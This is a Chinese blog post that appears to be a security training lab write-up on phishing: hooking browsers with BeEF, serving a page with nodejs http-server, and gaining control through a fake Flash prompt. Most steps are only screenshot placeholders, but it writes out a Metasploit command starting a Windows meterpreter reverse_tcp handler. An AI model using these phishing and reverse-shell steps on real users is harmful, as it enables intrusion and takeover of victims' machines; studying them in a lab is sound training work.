网络安全实训1——网络钓鱼攻击

网络安全实训1——网络钓鱼攻击

W1ndys Lv6
  2024-07-11 08:14:24 2024-07-11 08:14:24 创建   2025-01-17 20:28:48 2025-01-17 20:28:48 更新      121 字  1 分钟  

网络钓鱼攻击

可能需要的:kali Linux 切换镜像源

安装并启动

image-20240711083230622

利用 BeEF 进行网页钓鱼攻击

image-20240711084432017

利用 nodejs 开启静态服务

补充利用 nodejs 开启静态服务

1
2
sudo apt update
sudo apt install nodejs npm

安装完成后进入你的静态文件所在目录

开启命令行

1
http-server

image-20240711084857787

image-20240711085531378

成功上线

image-20240711085547978

发送警告命令

image-20240711085907974

通过 flash 钓鱼获取目标控制权

1
msf6 > handler -H 127.0.0.1 -P 4444 -p windows/meterpreter/reverse_tcp

image-20240711094156735

image-20240711094705116

image-20240711095518328

image-20240711095843697

image-20240711095854111

image-20240711101710871

  • 标题: 网络安全实训1——网络钓鱼攻击
  • 作者: W1ndys
  • 创建于 : 2024-07-11 08:14:24
  • 更新于 : 2025-01-17 20:28:48
  • 链接: https://blog.w1ndys.top/posts/1536eb66.html
  • 版权声明: 版权所有 © W1ndys,禁止转载。
评论
目录
网络安全实训1——网络钓鱼攻击
  1. 网络钓鱼攻击
    1. 安装并启动
    2. 利用 BeEF 进行网页钓鱼攻击
    3. 利用 nodejs 开启静态服务
    4. 成功上线
    5. 发送警告命令
    6. 通过 flash 钓鱼获取目标控制权